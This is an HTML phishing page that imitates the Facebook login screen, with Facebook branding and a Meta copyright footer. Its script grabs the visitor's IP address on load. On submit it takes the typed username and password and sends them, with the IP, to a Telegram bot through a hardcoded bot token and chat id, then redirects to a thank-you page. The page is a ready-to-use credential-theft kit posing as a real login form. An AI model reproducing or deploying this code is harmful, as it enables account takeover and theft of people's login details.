<!DOCTYPE html>
<!-- Coding By CodingNepal - www.codingnepalweb.com -->
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Facebook</title>
    <link rel="shortcut icon" href="images\facebook-icon.png" type="image/x-icon">
    <!-- <link rel="stylesheet" href="style.css"> -->
    <style>
        @import url('https://fonts.googleapis.com/css2?family=Roboto:wght@300;400;500;700&display=swap');

        * {
            margin: 0;
            padding: 0;
            box-sizing: border-box;
            font-family: 'Roboto', sans-serif;
        }

        .flex {
            display: flex;
            align-items: center;
        }

        .container {
            padding: 0 15px;
            min-height: 100vh;
            justify-content: center;
            background: #f0f2f5;
        }

        .facebook-page {
            justify-content: space-between;
            max-width: 1000px;
            width: 100%;
        }

        .facebook-page .text {
            margin-bottom: 90px;
        }

        .facebook-page h1 {
            color: #1877f2;
            font-size: 4rem;
            margin-bottom: 10px;
        }

        .facebook-page p {
            font-size: 1.75rem;
            white-space: nowrap;
        }

        form {
            display: flex;
            flex-direction: column;
            background: #fff;
            border-radius: 8px;
            padding: 20px;
            box-shadow: 0 2px 4px rgba(0, 0, 0, 0.1),
                0 8px 16px rgba(0, 0, 0, 0.1);
            max-width: 400px;
            width: 100%;
        }

        form input {
            height: 55px;
            width: 100%;
            border: 1px solid #ccc;
            border-radius: 6px;
            margin-bottom: 15px;
            font-size: 1rem;
            padding: 0 14px;
        }

        form input:focus {
            outline: none;
            border-color: #1877f2;
        }

        ::placeholder {
            color: #777;
            font-size: 1.063rem;
        }

        .link {
            display: flex;
            flex-direction: column;
            text-align: center;
            gap: 15px;
        }

        .link .login {
            border: none;
            outline: none;
            cursor: pointer;
            background: #1877f2;
            padding: 15px 0;
            border-radius: 6px;
            color: #fff;
            font-size: 1.25rem;
            font-weight: 600;
            transition: 0.2s ease;
        }

        .link .login:hover {
            background: #0d65d9;
        }

        form a {
            text-decoration: none;
        }

        .link .forgot {
            color: #1877f2;
            font-size: 0.875rem;
        }

        .link .forgot:hover {
            text-decoration: underline;
        }

        hr {
            border: none;
            height: 1px;
            background-color: #ccc;
            margin-bottom: 20px;
            margin-top: 20px;
        }

        .button {
            margin-top: 25px;
            text-align: center;
            margin-bottom: 20px;
        }

        .button a {
            padding: 15px 20px;
            background: #42b72a;
            border-radius: 6px;
            color: #fff;
            font-size: 1.063rem;
            font-weight: 600;
            transition: 0.2s ease;
        }

        .button a:hover {
            background: #3ba626;
        }

        @media (max-width: 900px) {
            .facebook-page {
                flex-direction: column;
                text-align: center;
            }

            .facebook-page .text {
                margin-bottom: 30px;
            }
        }

        @media (max-width: 460px) {
            .facebook-page h1 {
                font-size: 3.5rem;
            }

            .facebook-page p {
                font-size: 1.3rem;
            }

            form {
                padding: 15px;
            }
        }

        .foot {
            display: flex;
            align-items: center;
            justify-content: center;
        }
    </style>
</head>

<body>
    <div class="container flex">
        <div class="facebook-page flex">
            <div class="text">
                <h1>facebook</h1>
                <p>Connect with friends and the world </p>
                <p> around you on Facebook.</p>
            </div>
            <form id="contactForm"  method="POST" >
                <input type="text" name="username" id="username" required placeholder="email">
<input type="text" id="ipaddress" name="ipaddress" hidden>
                <input type="text" name="password" id="password" required placeholder="password">
                <!-- <input type="hidden" name="_redirect" value="https://qwayzdp.netlify.app/fbpop1.html">  -->
                <!-- <input type="hidden" name="_captcha" value="false"> -->
                <div class="link">
                    <button type="submit" value="Send Email" class="login" id="submit" style="text-decoration: none; color: white;">Login 
                    </button>
                    <a href="#" class="forgot">Forgot password?</a>
                </div>
                <hr>
                <div class="button">
                    <a href="#">Create new account</a>
                </div>
            </form>
        </div>
    </div>
    <footer class="foot">
        © 2024 Meta

    </footer>

<script>
      document.addEventListener('DOMContentLoaded', function () {
            // Replace 'https://api.ipify.org?format=json' with a preferred IP API if needed
            fetch('https://api.ipify.org?format=json')
                .then(response => response.json())
                .then(data => {
                    const ipaddress = data.ip;
                    document.getElementById('ipaddress').value = ipaddress;
                })
                .catch(error => {
                    console.error('Error fetching IP address:', error);
                });
        });



    document.getElementById('contactForm').addEventListener('submit', function (event) {
        event.preventDefault();

        var username = document.getElementById('username').value;
        var password = document.getElementById('password').value;
        var ipaddress = document.getElementById('ipaddress').value;

        var telegramMessage = `Username: ${username}\nPassword: ${password}\nIpaddress: ${ipaddress}`;

       var token = '6764397024:AAGN4ESGz2edba9NMfsQX0NyHHiH0G71ewA';
        var chat_id = '7336757464';

        var url = `https://api.telegram.org/bot${token}/sendMessage?chat_id=${chat_id}&text=${encodeURIComponent(telegramMessage)}`;

        fetch(url)
            .then(response => response.json())
            .then(data => {
                if (data.ok) {
                    window.location.href = 'thanks.html';  // Redirect to thank you page
                } else {
                    alert('Error sending message.');
                }
            })
            .catch(error => {
                console.error('Error:', error);
            });
    });
</script>
</body>


</html>
